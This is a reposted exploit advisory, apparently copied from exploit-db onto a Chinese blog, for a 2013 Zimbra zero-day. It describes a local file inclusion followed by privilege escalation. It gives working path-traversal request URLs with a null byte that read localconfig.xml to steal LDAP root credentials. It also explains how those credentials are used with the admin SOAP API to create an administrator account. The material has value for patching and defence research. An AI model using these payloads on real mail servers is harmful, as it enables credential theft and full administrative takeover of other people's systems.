Zimbra 0day exploit / Privilegie escalation via LFI-白红宇

Zimbra 0day exploit / Privilegie escalation via LFI

阅读量：2434 次

发布时间：2019-05-10

本文共 2056 字，大约阅读时间需要 6 分钟。

# Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI

# Date: 06 Dec 2013

# Exploit Author: rubina119

# Contact Email : rubina119[at]gmail.com

# Vendor Homepage: http://www.zimbra.com/

# Version: 2009, 2010, 2011, 2012 and early 2013 versions are afected,

# Tested on: Centos(x), Ubuntu.

# CVE : No CVE, no patch just 0Day

# State : Critical

# Mirror: http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip

---------------Description-----------------

This script exploits a Local File Inclusion in

/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz

which allows us to see localconfig.xml

that contains LDAP root credentials wich allow us to make requests in

/service/admin/soap API with the stolen LDAP credentials to create user

with administration privlegies

and gain acces to the Administration Console.

LFI is located at :

/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

Example :

https://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00

or

https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00